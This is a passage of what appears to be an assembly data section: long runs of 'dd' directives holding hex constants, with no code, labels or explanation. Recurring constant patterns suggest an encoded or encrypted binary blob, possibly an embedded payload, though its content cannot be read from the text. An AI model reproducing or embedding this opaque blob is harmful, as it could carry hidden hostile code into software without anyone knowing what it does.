489AACF5h, 0EF80D590h, 8DA6E35h, 42E07CD0h dd 0E2C325F0h, 5721F211h, 0CC334703h, 28E5CDAFh, 3E80804h dd 0A3A01890h, 18C36360h, 1A55D5ECh, 30038EAh, 0A82194AAh dd 0C0CA3330h, 0EB60D851h, 684BD388h, 8E53D31Bh, 0FC54CD1h dd 0AA0BAD32h, 0DF0FBF73h, 23734C9Bh, 0A214E8FCh, 82328910h dd 0F815078Fh, 0ABA058A5h, 0DD4B3474h, 68A06DA4h, 6283AFDBh dd 0C2275F17h, 41405030h, 82A3DB07h, 168A06Ah, 0A5A01890h dd 0B66A59F2h, 0AB102D19h, 0BE46ED99h, 2C259850h, 4102B038h dd 0A8569EC5h, 0CB620F70h, 28A0F0C5h, 0C99D38B0h, 28FB513Dh dd 0C29DF3F0h, 2B20D826h, 0C8489C4Ch, 0E8D95C5Fh, 0E401F870h dd 28A01A98h, 49C450E4h, 0FD1F58D0h, 88404D60h, 2CAD649Bh dd 0C841BC14h, 0E80A8850h, 880FC98h, 7CF24E90h, 0DD3F6FB0h dd 68A06D5Ch, 1F8DB1C3h, 0A8209914h, 0CA2AE961h, 8061B201h dd 4880F870h, 7435E7C2h, 0DEC07885h, 3394AE55h, 8C682CA0h dd 0FF209811h, 0E8640CCFh, 1760D852h, 48B6D0E5h, 0E8254190h dd 5C232EC4h, 234D380h, 0DF512AF0h, 64B56746h, 9140F805h dd 381518D5h, 34150726h, 0A5A058A5h, 1F927CE7h, 0E5B81CBAh dd 88017C67h, 68133310h, 3B19A85Ah, 0B83088FBh, 58D0A820h dd 4C35E7C2h, 0C9C07885h, 68E25014h, 0AC7487F0h, 0B0B56718h dd 9B40F806h, 0DE784DAFh, 0CADDF830h, 16201894h, 0EC14DBAh dd 7D64D55Bh, 91E378B0h, 0B8200D9Dh, 1943B870h, 6CB22706h dd 1708F7B0h, 27A01891h, 48C12834h, 52DED8D0h, 8466885h dd 2C2F982Eh, 0C840B931h, 9D40E6D0h, 3601BE81h, 6FEE51C0h dd 874B7AC5h, 27E11E16h, 0E251B6DBh, 0FB76C910h, 0FE502DCFh dd 0D339D810h, 0D705F7B1h, 0A5A01890h, 8DD9A35h, 0E032D0h dd 880078FCh, 3DDFCB40h, 0C8008E20h, 0E860D46Dh, 0B705F770h dd 0C1A01890h, 48C03801h, 3AB06651h, 0D0F2EB9h, 0A82098B5h dd 64487EB3h, 6C6FD56Ch, 880F8E9h, 0DBD538ACh, 47FA041Ch dd 68E0D455h, 0A80DD5F0h, 9500B830h, 0BC25DF11h, 0D4CCA725h dd 89FC8D50h, 4080E7EEh, 39B54CC4h, 18E32651h, 0FD2F57CAh dd 57675E78h, 7271B730h, 0E860FF40h, 0F7D21A87h, 6895A405h dd 18000BB0h, 80B00880h, 880078F9h, 0C657F754h, 0AC21D75Ch dd 0C8F52750h, 8D80B846h, 1B966C50h, 245B179h, 39E018E6h dd 88027898h, 0FE71C990h, 0ECD54760h, 65609866h, 489BFBE5h dd 0E1934890h, 
1A9069E4h, 0FD1F0981h, 88404D9Ch, 57049C97h dd 887584A5h, 68A32050h, 48958FFDh, 0EB591990h, 1C8677E3h dd 2DB21987h, 0EB6935ACh, 0C753F762h, 9F1CCC56h, 8704B639h dd 4BDC8B07h, 4DD26AE5h, 2D964CDEh, 7892BA2h, 0F045249Eh dd 0DA4FF460h, 9C40CA55h, 8D07AA31h, 7BEFB004h, 28A218E4h dd 48C0C84Fh, 1A9058D0h, 0E569009Fh, 0CB52F13Eh, 0A92CD957h dd 984EA128h, 41CEF81Ch, 528053D3h, 30B24CC2h, 629229B3h dd 0DA452BA5h, 9A10ED30h, 0F9708D00h, 0C640F670h, 42ADC250h dd 8EE51DFh, 3AA94E96h, 3DEA2DA4h, 88007818h, 45A1C510h dd 0C800A584h, 0FD175D96h, 0F780F830h, 68958C05h, 5728F9B0h dd 768A64A4h, 0BD50CD7Bh, 4799850h, 0E235960Ch, 175E5936h dd 85A38D6Dh, 6896582Dh, 4AB6B3B0h, 0CD86FD87h, 0BB6AFD7Dh dd 2DAF9850h, 0C8008BA0h, 122651AAh, 0F37EB6FCh, 0E7421921h dd 0CD4D7B5Bh, 68A04D61h, 0E20012A0h, 0CB5671Eh, 4B40F805h dd 0EC68FC2Ch, 0C68D305h, 7BA01890h, 0B7C07BF6h, 28D5D045h dd 744890F0h, 0AFC867EFh, 9B40B830h, 0A73F9B16h, 9D7FF823h dd 28E02D18h, 0B73C0958h, 9BB6B02Fh, 5FF870Fh, 0A8608B13h dd 0C840B3D8h, 0AD338D50h, 26B2CB22h, 28EC54D4h, 7D5CAD4Fh dd 62085890h, 0FF0078F0h, 0C152E863h, 8926CC5Eh, 7D9F8850h dd 8C0CD38h, 1DF49D19h, 79CF38F0h, 7000D55Dh, 0D8978B0h dd 0A860AE56h, 54D54761h, 7B609865h, 880FC18h, 0C5159590h dd 11C078A8h, 5ECCE55Dh, 5EE878B0h, 0CEDF67E6h, 0D5273DF7h dd 189FD810h, 15E95DF3h, 0A5A018D0h, 8DD1F25h, 2B408D0h dd 0DA0012F1h, 0A8209A78h, 0F8D547B0h, 6D609866h, 2AF5A2B0h dd 35FA951Dh, 229238F0h, 0F55D5D6h, 0DC0038EDh, 0F970C846h dd 0FCD54762h, 0B0609866h, 3EAC6D8Fh, 0AD6618D0h, 488000FDh dd 68ECB0D0h, 0DB5778F0h, 9B6BDB5Fh, 84049602h, 7D9FD81Ch dd 8C0CDECh, 28A77003h, 0FD4D38B0h, 68A04094h, 74BDF5A9h dd 4020D825h, 37BF4E61h, 0E860D4B8h, 46C9AF70h, 7CE556D9h dd 48C7C9Eh, 0F475A7D0h, 0D0038C5h, 4FA497D0h, 5B40B831h dd 0E860DD38h, 8A357570h, 71A05888h, 7ED8853Dh, 72085890h dd 0BFF8706h, 0E81684ADh dd 4C4FB830h, 0E860D992h, 91014F1h, 40F41890h, 48C039B1h dd 5D1CCD2Fh, 4C8178B0h, 0A8209980h, 0A2943360h, 7D9F8A50h dd 8C0CE6Ch, 5DF9D815h, 5B4850BDh, 0FD1F58D0h, 88404D4Ch dd 
15A37AFBh, 0C800A559h, 6549AD50h, 489D95F5h, 0BD5F4890h dd 48800EB8h, 0ECEF9855h, 880079CBh, 232CD89Bh, 47704730h dd 0A87DB1D5h, 45053E70h, 29A058A8h, 49AA38DAh, 0FD1F5ABAh dd 88404EE4h, 0A7DF6093h, 0C841AAB4h, 7DED4B50h, 8C0E515h dd 7BF208FAh, 7EC4AD4Fh, 0A8655890h, 88F2FDFFh, 15AD9810h dd 0C800A5B6h, 5488D0E1h, 607F078Ah, 28A01804h, 0C12613EEh dd 97B47CE4h, 0C835E065h, 3C9D1510h, 7940F82Dh, 12FD3051h dd 4C0B078Fh, 0C86108B4h, 6C8433B8h, 600099D4h, 80243CFBh dd 0A8257040h, 0E665B830h, 0BF60A066h, 3DD46D8Fh, 0EC2318D0h dd 4E87FEBCh, 0E975D5F0h, 0E20038EDh, 0A801F010h, 9B12B830h dd 0DE704DAFh, 740DF830h, 0D7F70CB4h, 8F56025h, 50E49ED0h dd 886A38FAh, 5773CF40h, 8876A8A5h, 6586DB50h, 489D5ACDh dd 40A07290h, 48C038BCh, 0FD1F0B87h, 88404EE0h, 0A820942Dh dd 450DCD30h, 0A85696E5h, 450D7570h, 3A058A8h, 19C0527Eh dd 0FD1F0B86h, 88404EFCh, 0D6206093h, 36CB291Fh, 0DE2E6DDDh dd 530F830h, 38D5B662h, 0B238D0D0h, 1A81A72Fh, 5099BE7h dd 42CB9967h, 66B77BBh, 0DE2E65DDh, 0AC73F830h, 914BEF17h dd 4855C7E3h, 0E8E018E6h, 0C8150F4Dh, 82549910h, 0C8358858h dd 54F52750h, 8880B845h, 6898552Dh, 59B438B0h, 7589DD17h dd 880078B0h, 2DE69810h, 0C800807Dh, 16363150h, 8D47078Fh dd 28E00D10h, 0C8C038B0h, 68E49A8Dh, 0A84F72FDh, 0C64FF77Eh dd 0E826D710h, 8D06B13Ch, 28CFD851h, 4DCD71E4h, 68AF4C90h dd 0D8C3DB3h, 0FC610A92h, 0A22DB975h, 0E8609810h, 9B409770h dd 6DED9505h, 49C738E2h, 26A55CC2h, 3AEA55F1h, 0E6651495h dd 0DB45F464h, 0E839D443h, 9810B938h, 66E1D809h, 50C538F4h dd 3CA35DC0h, 449436B1h, 0E9740BD0h, 0C649FC7Eh, 0E5608257h dd 8937D25Dh, 61E89B04h, 49807FFEh, 2CE054DCh, 9C021B1h dd 0E6201C9Eh, 0DC48FF79h, 0A726981Ch, 9A06F822h, 6CEE9D19h dd 8E938E3h, 3CA959C7h, 3FEA55EAh, 0ED721D98h, 0CD52F930h dd 0BD2FC110h, 9A06F87Ch, 6CEE9D19h, 6B8027E3h, 69A555DFh dd 489411F0h, 0FC200B99h, 8945F579h, 0EF34F110h, 890CF823h dd 5A19D04h, 0AD2B819Ah, 9CB9D56Bh, 0AF645C9Fh, 2E1451C0h dd 9F72D000h, 0C33A0C70h, 599A3D55h, 489C1257h, 87C9C7C7h dd 0F3D326E3h, 9EFF2D3Dh, 11AD3FDFh, 379CF72h, 0A6B9D20Ah dd 4E74CB30h, 
0B033AA60h, 446C4448h, 3B014672h, 9AE835CAh dd 880078E0h, 0A8209810h, 0C840B830h, 0E860D850h, 880F870h dd 28A01890h, 48C038B0h, 68E058D0h, 880078F0h, 0A8209810h dd 0C840B830h, 0E860D850h, 880F870h, 8D237890h, 48800116h dd 0C245DBD0h, 880038C9h, 0BC632F1Fh, 0C758EBBDh, 0EB6693E7h dd 2CC473A0h, 24E233B4h, 0AFB21C2h, 0E3F42BD8h, 0CA2B6CB2h dd 0EB5111Ch, 4140F809h, 0A85972D5h, 8B851370h, 0F1423052h dd 48C4FAD1h, 4A17DD58h, 0ECE878B0h, 0C0209810h, 0C840B810h dd 0CA445DDDh, 31D9F830h, 0ABAC6C88h, 0BF223C70h, 516EDD2Fh dd 7FC378B0h, 5FAD9BC9h, 2B40F812h, 14102740h, 0E003F8FFh dd 0A156FA94h, 8E21C2Dh, 68DADBD0h, 0BA2B7D84h, 2530EA13h dd 9318447Eh, 0E85A5B0Eh, 3A7FFC04h, 5A5F1B7Bh, 0B797D0A0h dd 0A6CBA72Fh, 0B1AAF5DBh, 0AB789850h, 47838C7Bh, 0A8594AD5h dd 86053F70h, 28A058A9h, 0A0C038B0h, 68E058ECh, 0B18EFD7Bh dd 0DDC89850h, 20BF47C7h, 0E860D848h, 310E45F3h, 5DA018D0h dd 0E85DB1B8h, 83E018F2h, 68D876Ch, 6B20D829h, 0F1D23DBFh dd 7DE9D810h, 8C0C1FEh, 28A01B78h, 8B090BB0h, 6860CB5Bh dd 605278F0h, 57DF66FDh, 0F1EA2D33h, 3E63D810h, 88C82F3h dd 29A79C9Fh, 324338B0h, 0ECEF58C0h, 8800780Dh, 0F82CDA9Bh dd 37BE70D8h, 42E5DBAFh, 0B80B849h, 202A4856h, 3CC0C130h dd 4619D8C9h, 63407B84h, 0A96813E1h, 179F59B1h, 11E1078Fh dd 8CCB434h, 3F9F4E5h, 0B239BB78h, 6857D7DFh, 96678F0h dd 9A136668h, 0C8EB3D3Fh, 6B36D850h, 0DF5F84Ah, 0C3B0521Bh dd 4BCAB3B2h, 1A080921h, 8BFF870Eh, 0E81932A5h, 8C51530h dd 6C6F2328h, 880F8F4h, 110AAD6Fh, 0A09038F0h, 971FA685h dd 0B1AAFDF3h, 2DAF9850h, 0C800819Ah, 0BB44DC53h, 3B8238F3h dd 2016174Bh, 81402A53h, 4C210BF0h, 94297CD4h, 8C2CB134h dd 21ABF86Bh, 3F6F23D1h, 36F425CBh, 6D08E311h, 7EB4E3DEh dd 53B9A351h, 0A6748751h, 8AF66391h, 0EE341485h, 1F323D1h dd 16F40B28h, 0C1DDE311h, 5EB4CBE8h, 57A6A351h, 867499D5h dd 97106391h, 0CE345915h, 0D1F24DAFh, 0E1DBF830h, 0D75FE7E1h dd 5C02BBEEh, 971EB739h, 0E200BB0Fh, 0BDC8C014h, 40BF47C6h dd 0A84409C5h, 39389E70h, 0E8421A88h, 0AAC23B54h, 6E8AF3B6h dd 7DFA90A8h, 6AA367EFh, 0A2913F38h, 5888055h, 887F0785h dd 23D31B6Ah, 0CDC26800h, 
68A07C01h, 0E227935Ah, 288AC078h dd 0D035BBCAh, 2588C9E0h, 0B07F0785h, 28A01891h, 45B4EA34h dd 0A21EB801h, 8DEB8E1Bh, 0A82098A8h, 77A213B0h, 0D4DD5593h dd 0FF80B844h, 68942915h, 48C038B0h, 0D8E32C50h, 0DF7D290h dd 0A860AC21h, 0C940B833h, 0E8965C5Fh, 5D38F870h, 8348F41Bh dd 0DE7DB11Bh, 0D8E018E9h, 7FABD218h, 0E814A995h, 0C840B830h dd 72DD5151h, 7C80B849h, 1925EFDBh, 48C07884h, 0D0E258D0h dd 0BEFF1C97h, 0CF989D65h, 636E3354h, 0E8606036h, 0BF45316h dd 0DF0A4520h, 8F40935h, 68E058D0h, 0E58DC0F8h, 0BE559818h dd 0FC713DC7h, 0E860D810h, 8B38FC70h, 5CA01055h, 0A54380B5h dd 274B5828h, 0BC31FD07h, 0A8239850h, 0CC34B830h, 43CA31E0h dd 31167DFBh, 0E72B18D0h, 49F09Bh, 5965AF2Ch, 8B0038C4h dd 0DC209810h, 0AC27006Fh, 55E9EEAFh, 8C0C1EEh, 28A0A03Bh dd 0F06B5CD7h, 68E07E59h, 76BD905Bh, 889067EFh, 37BC77D8h dd 8E593BAFh, 6E9507C8h, 0A30B893Bh, 8F40925h, 9F32AFD0h dd 88007B32h, 4034ED10h, 37BF46A7h, 4188C7E0h, 6E7F078Ch dd 4EB5E728h, 0C36BA91Bh, 0F665D31Fh, 0A30038C9h, 546811D8h dd 0FC713DC7h, 0E864D810h, 1AF4F870h, 0D6603128h, 40789378h dd 0C3E42C10h, 63F80D48h, 2DD73377h, 0C8008C01h, 0E860D858h dd 0B500B205h, 28E02CBFh, 0F0814CB0h, 0A1C940F9h, 0BC2BDDFAh dd 4CE09850h, 0E3E5B233h, 43609864h, 822A49C0h, 68943715h dd 87092B0h, 5CCBDDDAh, 0EEAA78B0h, 5FDD7AA8h, 887489B5h dd 0E860C850h, 0B8878C70h, 90C6B2D9h, 0E3A6C4C5h, 5B4AB060h dd 3589D330h, 0A860A192h, 0FC713DC7h, 0E840D810h, 1F5F870h dd 0ADAA4020h, 48800C99h, 0E9583E7Ah, 0B9858F30h, 0E820D824h dd 0BC40B830h, 0C0A45853h, 3CA95D7Ah, 83C618D0h, 71468539h dd 9F4B5890h, 0C8344975h, 0A8209810h, 7849CD70h, 0C1E5DA00h dd 0A280B844h, 1C919D67h, 484038F0h, 639558D0h, 0D0AC040h dd 0A860AC3Ah, 0AE7D539Ah, 1F78E9E8h, 48B4C9F5h, 28A11890h dd 0F8C24CB0h, 424552F9h, 480038C4h, 0D2A9BF4h, 0C8008C1Ah dd 50067336h, 8D7708F1h, 28E02CA1h, 48C03AB0h, 0A0545AA5h dd 0BC2ADDFAh, 3469850h dd 0F1E205B9h, 0D4D8D810h, 0A380F854h, 1C919D67h, 48C838F0h dd 49458D0h, 0BC31FD07h, 0AC209850h, 0C335B830h, 6D6A60E0h dd 8C0CC5Bh, 0DFEDF33Ah, 8F40935h, 68E858D0h, 
0EE110DF0h dd 0A2C01BA8h, 88749395h, 0DBCBBE50h, 1D6B52B0h, 3089A0F6h dd 7CEB9DBAh, 8C205890h, 0A3A572F3h, 0CE20D824h, 0F9C54F9Bh dd 0E8609864h, 6E80F860h, 5C609928h, 4004B8B3h, 5CCBFDDAh dd 236678B0h, 87A52E1Fh, 6340F804h, 0DC515DA7h, 880F830h dd 21D45890h, 0CDC26800h, 68A06CF9h, 0B9858F5Ah, 0A820D824h dd 7840B810h, 0EC62ADD6h, 0F6CF7574h, 1C89BD1Ah, 0C54938F0h dd 68A0615Ah, 7480D396h, 1827ED15h, 370F3830h, 6D977210h dd 8C0CC41h, 28A05890h, 79A680D6h, 41545AA5h, 90B0D396h dd 9C0B1D1Ah, 2880B870h, 60D07253h, 3CB17D87h, 0A8A018D0h dd 4AB538B0h, 0CD6ADE60h, 88404CD9h, 54A03376h, 7847CD35h dd 172F5850h, 8D775230h, 28E02CA1h, 48C138B0h, 285053A5h dd 0BC29FDFAh, 438A9850h, 4BF8DE3Fh, 0C1C5D290h, 6E80B844h dd 82A1A83Bh, 7CF1BD47h, 68E05890h, 0A77578F2h, 9C111DE7h dd 0C840B870h, 0F215D854h, 8D8A38C0h, 28E02CBBh, 7CF09D3Ah dd 88215890h, 0EEB81EE0h, 0A8903391h, 88F0B0DBh, 0DC4B5D5Ah dd 0FF2AF830h, 68942915h, 40C038B0h, 0EF02DD0h, 82E8FB48h dd 0E814B2B5h, 78EBDE30h, 58683351h, 2205F238h, 82A058A4h dd 7CF1BD47h, 68E05890h, 0FDB178E0h, 1046BD65h, 6D4A40B3h dd 0E820EC7Ah, 0C8B35316h, 0A21D313Ah, 0BFC07889h, 28D46955h dd 0A80078F0h, 193FED10h, 0AE5B5347h, 0E278D1E8h, 48B4D2D5h dd 2B44D890h, 7CEA9DBAh, 0C3865890h, 0B18AC5D9h, 69AA9850h dd 0F1CA1DBAh, 4306D810h, 8D82A0C0h, 28E02CB9h, 7945CF1Ah dd 6BE018E4h, 870178F0h, 0A8201F94h, 0AC270030h, 65EBFEDBh dd 8C0CC41h, 28A0E911h, 89373AB0h, 6BE058D0h, 0EFB87D85h dd 30E1F74h, 0C840B888h, 9DCBBE50h, 83389E76h, 900B7E75h dd 4E4F5FD4h, 0E206B7Bh, 0B9858F5Bh, 0A820D824h, 0BD41B830h dd 0D9E52F10h, 880B844h, 5CA81890h, 0C5785E96h, 5965AFBCh dd 880038C4h, 0A7229810h, 294A79A5h, 21E47336h, 0B0E6F005h dd 83C61CB4h, 40702B5Bh, 0EEEB37Ah, 8A5D2048h, 0E814B395h dd 23EBDE30h, 42A96853h, 3CB17D87h, 28A018D0h, 68B4B8B0h dd 0EDCA5F60h, 88404CD9h, 0A53A78D1h, 0C864B0B9h, 0DC497D52h dd 0EC40F830h, 2C649893h, 0E2A1881Bh, 881FE0B6h, 0BC29DDFAh dd 3469850h, 0FC713DC7h, 0E840D810h, 5BF4F870h, 1C919D67h dd 48C038F0h, 659478D0h, 8803BF07h, 0AD549810h, 
23EA2880h dd 63A753A3h, 48B97AFDh, 0A1613390h, 1070C4F1h, 5CC9DDDAh dd 7FAA78B0h, 0E814A995h, 8840B830h, 8E6CAC50h, 243A8C8h dd 68943115h, 2ECAD3B0h, 6200A768h, 0C8345155h, 5F8BFE10h dd 887489B5h, 0E860DB50h, 0FFF38C71h, 68942915h, 48C038B0h dd 9FED2CF0h, 88007B37h, 1825EC10h, 3BAB12A0h, 6DEB17DBh dd 8C0C1EAh, 6029D0BBh, 0BF090B4Ch, 28D46955h, 80078F0h dd 252EED10h, 887491B5h, 0A8685250h, 7B8301F0h, 0E5A49568h dd 48D01CF4h, 0D8E8B811h, 8EE3D37Bh, 68112076h, 70261356h dd 500858DFh, 0A80F870h, 700B7E71h, 3D09BD1Bh, 59583ED6h dd 38AB1E30h, 2DAD32D3h, 0C8008C0Ch, 0DC515DA7h, 880F830h dd 2ED50890h, 103813E7h, 3B6B413Bh, 0A3F853D8h, 0AAD13C0h dd 0C940F809h, 0A8595AC5h, 83B9F970h, 0A1A43CD4h, 8D0550Dh dd 0EE5DD3D0h, 0A30038C9h, 0E8191A95h, 0F9C54F30h, 0A8609864h dd 7C80F870h, 8378EF92h, 1EC03C72h, 0C65DDB87h, 880038C9h dd 0A9F91C1Fh, 0C5A8B830h, 0A360D850h, 4DCEAA35h, 6922BDCh dd 488C74F4h, 5D68CD2Fh, 0D8978B0h, 0A860A1AEh, 0F4183363h dd 9B9F0053h, 3CC37358h, 0D756E478h, 0EE55B34Fh, 33E018E9h dd 10C3AF3h, 0E8195A95h, 0C002BB30h, 0D1A65DD9h, 7B0BF830h dd 0A813E7B8h, 0A0C038B0h, 971FAE05h, 0B1A6C57Bh, 40769850h dd 37BF4EF9h, 0D1C64DDBh, 420BF830h, 24EA1B98h, 0A143F69Bh dd 86857D5h, 870078F1h, 0A821C294h, 62F5BB30h, 0EB609869h dd 48B98AC5h, 0C09CB490h, 4862BDBFh, 2E6D58D0h, 0FA8553F4h dd 0AB20D829h, 4EA8E836h, 6B9F27A6h, 48B95ECDh, 23D51890h dd 47CC7F8Bh, 68E14353h, 0B10C93F0h, 0E8193E85h, 0C5C5B730h dd 0EB60D851h, 48B98AF5h, 10217E90h, 0CDCF1D4Fh, 68E0582Ch dd 0A302387Bh, 4070AC53h, 37BF4E79h, 0D1C66569h, 8D8FF830h dd 28A01874h, 716ABDB3h, 0EDE35890h, 88404182h, 0EF0B989Bh dd 5C2B73Ch, 0D360D850h, 8B8FF037h, 28A01854h, 4BC2F833h dd 0EDE34C97h, 88404182h, 1DDFC842h, 0C800818Eh, 0DD284DAFh dd 8DDAF830h, 9F251750h, 0A1C038B0h, 68E0584Ch, 0D0F87CCh dd 0A8209884h, 0C75586B0h, 0E86053D5h, 9C67370h, 78945BBBh dd 0B735E058h, 0CE5D612Fh, 0FD0038C9h, 2A59B67h, 0CB40F809h dd 0A859AAD5h, 0C2057170h, 0A3A058A9h, 8A4503B0h, 1AE018E9h dd 4E8543F8h, 0DA20D829h, 0C8408559h, 0DF12A850h, 
880E798h dd 0D4EE9590h, 4AEBF93Bh, 53F01AD3h, 0C839B275h, 2B2CED10h dd 0F9BFA8F4h, 0F4449CDFh, 0CB9B1311h, 11329D1Fh, 0C3A038F0h dd 28D92A65h, 7E7690F0h, 14167EFh, 4840B830h, 0AF4BD625h dd 33898A7Ch, 0AAAF10D7h, 0B73FC78Ch, 0DA655799h, 3FF870Eh dd 0FA1BC2Ch, 0C8409C01h, 979F27AFh, 4201C49Bh, 28A078B4h dd 88F37650h, 0EFC4545Bh, 0C839D675h, 9D991510h, 0CB40B814h dd 0A859AAD5h, 0AD259E70h, 2B6633DEh, 0AEB2CF2h, 93A69EDCh dd 0DA81BF18h, 0AD209810h, 4140B830h, 0B63F2416h, 463575B3h dd 7EA058A8h, 7DBCAD4Fh, 90635890h, 3384770Fh, 21209810h dd 8879EAB5h, 0BE60B250h, 3D346D8Fh, 0E82518D0h, 4864BCBFh dd 0A8CB58D0h, 8B6A28A0h, 0C021F240h, 840B830h, 0B4F52706h dd 8B80B845h, 0ACAFE768h, 48C03D8Eh, 51B6DD59h, 58D78B0h dd 0A860A14Ah, 0F1222DBDh, 0BA31D810h, 0F7D0F81Ah, 68959C05h dd 0B738BBB0h, 6DECDCDFh, 886A78F0h, 91762DEFh, 5DBFB870h dd 0E820EDD0h, 77F00F3h, 28A4ED14h, 2245B1B0h, 5BE018E9h dd 0D9C37B39h, 0AC4AC940h, 9EF54761h, 17609869h, 48B598E5h dd 27609D90h, 48C4E934h, 0E1296BD0h, 0C8391675h, 0F971C910h dd 0C740A758h, 7D9F8850h, 8C0CDD0h, 0ACAFD815h, 48C03C3Ah dd 5192DD59h, 30C378B0h, 0A820F1DDh, 3F78F3BBh, 0A854E9D5h dd 880F870h, 2BA66D80h, 8D05535h, 6B326BD0h, 7FF18F31h dd 0D2A511F1h, 7040F809h, 0E860FC6Bh, 0BBCB3FBh, 68B07515h dd 4B120BB0h, 9F11AF11h, 0FE85F111h, 6B20D829h, 0CE0B0F3Fh dd 65553BA9h, 0BF8FE023h, 0F8A30CD3h, 600153F9h, 526188D3h dd 0E6690FAFh, 2B3DECE9h, 0BA41B44Ah, 0D42B53B0h, 0B94BAFBh dd 6C2D08D2h, 9137C7F8h, 0EDDB99F3h, 8840419Ah, 8C7413D3h dd 47808B20h, 0E86060D2h, 0C70B3B70h, 952D137Bh, 488000FEh dd 5B3FD32Ch, 0E93CD439h, 0D21C9E62h, 0E86CBA47h, 9C3CE4FAh dd 7CAEC49Ch, 5DA0244Dh, 0C309DB58h, 30A565D1h, 837478B5h dd 0FA63CB2Dh, 0FBC5B730h, 639F27AFh, 41D7C573h, 0ACAF5BDEh dd 0B73FC796h, 3DA30FEDh, 938477BEh, 95DF67EFh, 0FA73FB67h dd 17705C5Fh, 58BD078Fh, 27EF4CC3h, 0B73F3D34h, 803B6B2Fh dd 77FF86DDh, 56D81C1Fh dd 1A7347CFh, 0E860CEB8h, 0F7EF1070h, 2848E76Fh, 15C038B0h dd 476AB551h, 0B5E978B0h, 0CC209813h, 7DCB8ACFh, 0E820E122h dd 6EA27114h, 72ED2611h, 
4BE6BDBFh, 366B58D0h, 0EEDE7BCCh dd 0ED70A391h, 0CB563D3Fh, 0AB97D850h, 8A0F866h, 21251790h dd 0BEC038B3h, 0E3E20493h, 0C0F58BEh, 0A8209AECh, 31C1B4D3h dd 0E860D951h, 0A6E7E7Fh, 0E5481890h, 473FC74Eh, 68E2BB52h dd 984AF3F0h, 102CD213h, 0C841B830h, 28E3001h, 9DB0078Fh dd 28E02CBFh, 0FDF01801h, 68A06CE0h, 41FE589Ah, 4034E048h dd 37BF52E4h, 7C6F0AD5h, 39622BB2h, 68942905h, 2025D3B0h dd 68E058D6h, 880610A9h, 40789810h, 37BF5284h, 0DC495DDAh dd 8C06F830h, 689431BAh, 6145B0B0h, 8AE018E4h, 0B9858F10h dd 0A020D824h, 0BD40B830h, 0C3DD5859h, 980B844h, 0AD57DDE4h dd 48800C81h, 69E058D3h, 35806384h, 0A860AC39h, 48F0CC35h dd 0A854F2EDh, 0AFF4FD70h, 1C8BA510h, 3CC538F0h, 5965AF4Eh dd 880038C4h, 0DCA09810h, 0E1FD3839h, 0EA609864h, 0AD037107h dd 28E0213Eh, 0BC4FD0B0h, 0A808A72Fh, 60FF870Dh, 0A8209A35h dd 0F13625BBh, 3688D810h, 77F078Ch, 28A21314h, 3A75B3B0h dd 0E3E018E9h, 560344AEh, 57DD47F8h, 3DC2B7CFh, 6960D851h dd 8E0DC3Ah, 0D62BF890h, 32C36EE2h, 789A5BC4h, 0BC31FD07h dd 0A8209850h, 0C635A830h, 0DC5C6DDDh, 850BF830h, 28E008FDh dd 0F1979C43h, 68E051DFh, 9800CD7Dh, 0DD39850h, 0CAA3B881h dd 6D977CA3h, 8C0CC41h, 38A01890h, 4868BCBFh, 1B1F58D0h dd 796F90D8h, 3DAB67EFh, 0C8008196h, 6C6F0AD5h, 880F8E2h dd 11D2AD1Bh, 24B38F0h, 4CAAD9C0h, 68007890h, 0DB28D23Bh dd 0CB898B32h, 655BCC22h, 8C0E81Dh, 38CD951Bh, 1EB238F0h dd 0EBC4645Bh, 0C8101555h, 0FA39810h, 0C840B85Dh, 0E01A5350h dd 0B88B271h, 0A3579F67h, 8F9BE35h, 5965AFD0h, 0C80038C4h dd 0DC209810h, 0CB584F32h, 0D849D422h, 312E4DF9h, 5B2B18D0h dd 0BFF03998h, 28D46955h, 880038F0h, 5F22EC10h, 7CA8E928h dd 0B19F27ACh, 7B83F49Bh, 24D233B8h, 0EC336EE1h, 0DD6D018Fh dd 88404CCCh, 0F67F3CE3h, 45D2893Fh, 0E8610AD7h, 2715C270h dd 5DA058A4h, 301251B6h, 0E0F26C86h, 44E887A0h, 0F2DF67CFh dd 0CB4CF2BBh, 6D97C81Ah, 8C0CC41h, 38A01890h, 3DC6793Dh dd 0C66DD1C3h, 8B0038C9h, 0E830F595h, 0A5E73B30h, 0E860D850h dd 0F7A8BB5Bh, 68996625h, 1A47B1B0h, 0E7E058D0h, 0DF758B6h dd 0A860AC21h, 4840B830h, 32DF24h, 0F77F0157h, 862D93CAh dd 0ABC07889h, 40ABD1D3h, 
310327Bh, 0E819EE95h, 0C00A8130h dd 0A2E9DB23h, 18C2F978h, 28F87B13h, 71BABD3Bh, 54885890h dd 890078D4h, 0A9799052h, 5DCAE873h, 0E820EC7Fh, 3CB17D87h dd 28A018D0h, 4EB428B0h, 788DD5D3h, 88B678B0h, 9C111DE7h dd 0C840B870h, 0FC15D852h, 8D773E8Eh, 28E02CA1h, 48C438B0h dd 0DD6A5EA5h, 88404CC0h, 9C111DE7h, 8840B870h, 0E315D850h dd 0CA82FFFAh, 0CA761A3Ah, 0C2C9D347h, 0C2226AD7h, 7FE2AEF2h dd 23444A23h, 0CACFDC12h, 0BEDD5B08h, 880B849h, 0D3289C9Fh dd 0FD3FC74Fh, 68A061A2h, 0BDC4ED0Fh, 1DDF9850h, 0C800815Eh dd 0DD5C4DAFh, 850DF830h, 28E021CAh, 71A2AD3Dh, 3AB15890h dd 3DFF789Ah, 0A860A146h, 0FDF82DCFh, 5D9FD810h, 8C0C126h dd 1D9C8D6Fh, 0FD4D38F0h, 68A0609Eh, 0B152CD0Fh, 57769850h dd 88750CA5h, 0BEC55B50h, 880B849h, 28A0F053h, 229D38B0h dd 210DD9D1h, 0D00038C3h, 2DE197E0h, 0C800ADB0h, 6BA318D5h dd 77007B8h, 3D209D51h, 750338F0h, 68CA58C0h, 9666485h dd 0C42CBC6Ch, 0A853CD41h, 179F1CB8h, 0E0858D8Fh, 0D75FE3EEh dd 0B73FEA58h, 97CE392Fh, 0BC5600DDh, 0A8052002h, 2020B830h dd 179F27F5h, 4C0BC105h, 9D2D28B4h, 488000FEh, 0EE8085Bh dd 8A064271h, 0C076BD63h, 0C8BFB830h, 0E80A1CDBh, 9D7FA822h dd 28E02D68h, 0C9C8FC33h, 57DF04EEh, 0B030DACh, 83C89CD6h dd 20BF47CBh, 179F272Fh, 7C383B11h, 0C3A01890h, 48EF8001h dd 780858D0h, 4A0078F0h, 98989830h, 2040B830h, 0E860D853h dd 8580DCB2h, 0E5AC3CC4h, 4838BB9Eh, 808041ACh, 880078F0h dd 9804CC9Bh, 495A336Dh, 0A854CBBDh, 0EDB91070h, 0EAC1E76Fh 